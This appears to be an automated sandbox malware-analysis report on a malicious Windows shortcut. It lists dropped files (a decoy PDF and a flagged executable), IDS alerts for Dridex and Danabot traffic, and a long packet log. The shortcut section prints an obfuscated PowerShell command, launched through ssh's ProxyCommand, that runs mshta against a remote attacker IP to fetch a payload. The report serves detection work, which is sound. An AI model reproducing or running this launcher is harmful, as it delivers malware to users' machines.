                                                                      Preview:...................................FL..................F.".. .....*_.......6X..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_...\...6X..g...6X......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.@..........................3*N.A.p.p.D.a.t.a...B.V.1......Y.@..Roaming.@......EW.=.Y.@.............................R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y.@..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=EW.>...........................]..W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=EW.>....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=EW.>....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y.@....9...........

                                                                      C:\Users\user\AppData\Roaming\ggg.pdf

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PDF document, version 1.4, 6 pages
                                                                      Category:dropped
                                                                      Size (bytes):1348011
                                                                      Entropy (8bit):7.644353784937569
                                                                      Encrypted:false
                                                                      SSDEEP:24576:RpALBW4Dw5KYgPDgbECYMz50vXxkRAJbeDfTnUxGnnlv:kBW4MKYgcBYMzCvSUqDfzomlv
                                                                      MD5:8BB097B11BDAA4AD387D7E648712D4D3
                                                                      SHA1:70B3BEC7D52D13548EEE3B71E748C6C3D011F8C3
                                                                      SHA-256:F42E4CB924D4B8023827477FB136664A8426CB5AA208660288F4278CD523A5A4
                                                                      SHA-512:6F929BB7FD157750D1F152C5837344CA20FE6A51284F58305AB1D5D2F067859C5EA0AC5FAD6AE4514654A112F49214D359DB5522FE416A138B4004088DF423D9
                                                                      Malicious:false
                                                                      Preview:%PDF-1.4.%.....1 0 obj.<<./CreationDate(D:20240222130353+05'00')./Creator(PDFsharp 1.51.5185 \(www.pdfsharp.com\))./Producer(PDFsharp 1.51.5185 \(www.pdfsharp.com\)).>>.endobj.2 0 obj.<<./Type/Catalog./Pages 3 0 R./Metadata 23 0 R.>>.endobj.3 0 obj.<<./Type/Pages./Count 6./Kids[4 0 R 8 0 R 11 0 R 14 0 R 17 0 R 20 0 R].>>.endobj.4 0 obj.<<./Type/Page./MediaBox[0 0 595.08 841.68]./Parent 3 0 R./Contents 5 0 R./Resources.<<./ProcSet [/PDF/Text/ImageB/ImageC/ImageI]./ExtGState.<<./GS0 6 0 R.>>./XObject.<<./I0 7 0 R.>>.>>./Group.<<./CS/DeviceRGB./S/Transparency.>>.>>.endobj.5 0 obj.<<./Length 56./Filter/FlateDecode.>>.stream.x.+.*.2P...t.}.`...b.B.SKS=...............i..........F...endstream.endobj.6 0 obj.<<./Type/ExtGState./ca 1.>>.endobj.7 0 obj.<<./Type/XObject./Subtype/Image./Length 123720./Filter/DCTDecode./Interpolate true./Width 1653./Height 2338./BitsPerComponent 8./ColorSpace/DeviceRGB.>>.stream.......JFIF..............Exif..MM.*.............................u..........."...........

                                                                      C:\Users\user\AppData\Roaming\mama.exe

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):4277248
                                                                      Entropy (8bit):7.796835542143392
                                                                      Encrypted:false
                                                                      SSDEEP:98304:h+Dc6yHfpXZa1ZUVTZ2zsFi840WiRoYIUF4ZxStM3bQR:w9ylZIUVt2zd8rnH4jStM3bg
                                                                      MD5:72B6B07175EF611CE7DAA959A1248AAE
                                                                      SHA1:BEE9D33D83C98A7C2C3C9D0EB671FA1D53328378
                                                                      SHA-256:8E6AE3B356D2205296FEC0761DAA461A311190E50E0E611699EBB4AAD6E6CD77
                                                                      SHA-512:56F0EE5BA99A55F05BFEA0252B544D6DCAC6CC22DBF430E228BABD1520A14EA76429FCC8F67BCC0425F8D573211A1D1B47BA6164C136D8C2A85A26030CAE9F52
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                      Joe Sandbox View:
                                                                      • Filename: vreFmptfUu.lnk, Detection: malicious, Browse
                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....9ig..................>..f........>.......>...@...........................B..................@....................@.......?.......A..6...................0@.............................. @.......................?.d.....?.x....................text.....>.......>................. ..`.itext..P.....>.......>............. ..`.data...h}....>..~....>.............@....bss....._...p?..........................idata........?......\?.............@....didata.x.....?......t?.............@....edata........@......x?.............@..@.tls.... .....@..........................rdata..\.... @......z?.............@..@.reloc.......0@......|?.............@..B.rsrc....6....A..6....A.............@..@..............B......DA.............@..@................

                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):55
                                                                      Entropy (8bit):4.306461250274409
                                                                      Encrypted:false
                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                      Malicious:false
                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                      Static File Info

                                                                      General

                                                                      File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                      Entropy (8bit):2.660049738252906
                                                                      TrID:
                                                                      • Windows Shortcut (20020/1) 100.00%
                                                                      File name:A4FY1OA97K.lnk
                                                                      File size:2'408 bytes
                                                                      MD5:0306addb386436ae663da152bee03226
                                                                      SHA1:0c35bff3dafec0f21436b6db025a24e0102ce7b7
                                                                      SHA256:32a98d1b299d1feebb096cdeb38433013b7db6adf5d9923b539390d777bfac3f
                                                                      SHA512:b5508d380b65cc364d378f1ea69d33b9f4eed2f45b9cd48a4b13cd51e97d7e77eccf81516eca2b14229bfda80d05277693a03093ea7f553db88c78946bc718f7
                                                                      SSDEEP:24:8Ayj/BF//Z/U9p+/+GzmWbUk7KxZlEhSdd79dsHdUM:8ZLZwRGzmaUkuPltdJ9NM
                                                                      TLSH:AC4156442EEA0322F3B38EB544BAA621C43FBC16DE755F1D008D52482727614E575F7B
                                                                      File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                                                      File Icon

                                                                      Icon Hash:72d282828e8d8dd5

                                                                      Static Windows Shortcut Info

                                                                      General

                                                                      Relative Path:..\..\..\Windows\System32\OpenSSH\ssh.exe
                                                                      Command Line Argument: -o ProxyCommand="powershell powershell -Command '|\|AbH4Q3w|fYZxmshta https://150.241.97.10/aaa.mp4|\|AbH4Q3w|fYZx'.SubString(15, 35)" .
                                                                      Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-12-27T09:05:12.520857+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.749699150.241.97.10443TCP
                                                                      2024-12-27T09:05:28.138283+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749731150.241.97.10443TCP
                                                                      2024-12-27T09:06:42.110836+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.749903188.132.183.159443TCP
                                                                      2024-12-27T09:06:43.310390+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.749908206.206.125.221443TCP
                                                                      2024-12-27T09:06:44.453950+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.74991294.131.118.216443TCP
                                                                      2024-12-27T09:06:45.582391+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.749915188.132.183.159443TCP
                                                                      2024-12-27T09:06:53.596487+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.749939188.132.183.159443TCP
                                                                      2024-12-27T09:06:55.532704+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.749942206.206.125.221443TCP
                                                                      2024-12-27T09:06:56.636525+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.74994794.131.118.216443TCP
                                                                      2024-12-27T09:06:57.744654+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.749949188.132.183.159443TCP
                                                                      2024-12-27T09:07:03.248647+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.749968188.132.183.159443TCP
                                                                      2024-12-27T09:07:03.338643+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.749969206.206.125.221443TCP
                                                                      2024-12-27T09:07:03.422521+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.74997094.131.118.216443TCP
                                                                      2024-12-27T09:07:03.509957+01002034465ET MALWARE Danabot Key Exchange Request1192.168.2.749971188.132.183.159443TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Dec 27, 2024 09:05:10.954016924 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:10.954073906 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:10.954176903 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:11.012916088 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:11.012945890 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:12.520756960 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:12.520857096 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:12.849004984 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:12.849046946 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:12.849422932 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:12.849559069 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:12.851341009 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:12.895337105 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.341161013 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.341192007 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.341226101 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.341239929 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.341255903 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.341300011 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.465034008 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.465107918 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.515947104 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.516047955 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.537620068 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.537853003 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.564196110 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.564341068 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.598954916 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.599035025 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.711157084 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.711364031 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.720499039 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.720575094 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.730010986 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.730087996 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.742650986 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.742739916 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.752412081 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.752477884 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.761204004 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.761284113 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.836247921 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.836322069 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.845732927 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.845805883 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.917376041 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.917444944 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.926594973 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.926670074 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.937700987 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.937781096 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.945992947 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.946054935 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.954412937 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.954474926 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.960567951 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.960685015 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.968494892 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.968564987 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.974666119 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.974737883 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.981333971 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.981410027 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.988684893 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.988754034 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:13.994684935 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:13.994751930 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.005930901 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.006007910 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.012057066 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.012136936 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.127116919 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.127204895 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.131294966 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.131366968 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.136679888 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.136749983 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.140702963 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.140769958 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.144812107 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.144881010 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.150098085 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.150162935 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.154144049 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.154220104 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.158272982 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.158334970 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.162362099 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.162426949 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.167566061 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.167630911 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.171412945 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.171475887 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.192493916 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.192564011 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.196603060 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.196677923 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.200665951 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.200735092 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.214194059 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.214257002 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.218368053 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.218430996 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.337610006 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.337690115 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.341712952 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.341784954 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.345737934 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.345809937 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.350874901 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.350938082 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.354840994 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.354906082 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.358891010 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.358968019 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.362858057 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.362935066 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.367989063 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.368065119 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.371963978 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.372030973 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.375947952 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.376013994 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.380551100 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.380620003 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.402441025 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.402523994 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.405654907 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.405742884 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.410850048 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.410909891 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.424001932 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.424083948 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.427243948 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.427304029 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.547508955 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.547583103 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.550961018 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.551027060 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.554932117 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.554997921 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.556191921 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.556265116 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.556278944 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.556294918 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.556313992 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.556341887 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.556369066 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.556386948 CET44349699150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:14.556394100 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:14.556685925 CET49699443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:21.170782089 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:21.170820951 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:21.170890093 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:21.180223942 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:21.180238008 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:22.671564102 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:22.671650887 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:22.700272083 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:22.700324059 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:22.700643063 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:22.712353945 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:22.755338907 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.252818108 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.252846956 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.253015995 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.253047943 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.354114056 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.354211092 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.354227066 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.447412014 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.447426081 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.447470903 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.447555065 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.447599888 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.447607040 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.480715036 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.480730057 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.480766058 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.480797052 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.480808973 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.480838060 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.502254963 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.502265930 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.502291918 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.502319098 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.502331018 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.502357960 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.551594973 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.551609039 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.551632881 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.551695108 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.551708937 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.551743031 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.635335922 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.635349035 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.635380983 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.635426044 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.635468006 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.635484934 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.648288965 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.648298979 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.648328066 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.648365021 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.648395061 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.648410082 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.664298058 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.664310932 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.664349079 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.664375067 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.664387941 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.664417982 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.676376104 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.676384926 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.676404953 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.676441908 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.676476002 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.676487923 CET49719443192.168.2.7150.241.97.10
                                                                      Dec 27, 2024 09:05:23.686470985 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.686481953 CET44349719150.241.97.10192.168.2.7
                                                                      Dec 27, 2024 09:05:23.686501980 CET44349719150.241.97.10192.168.2.7
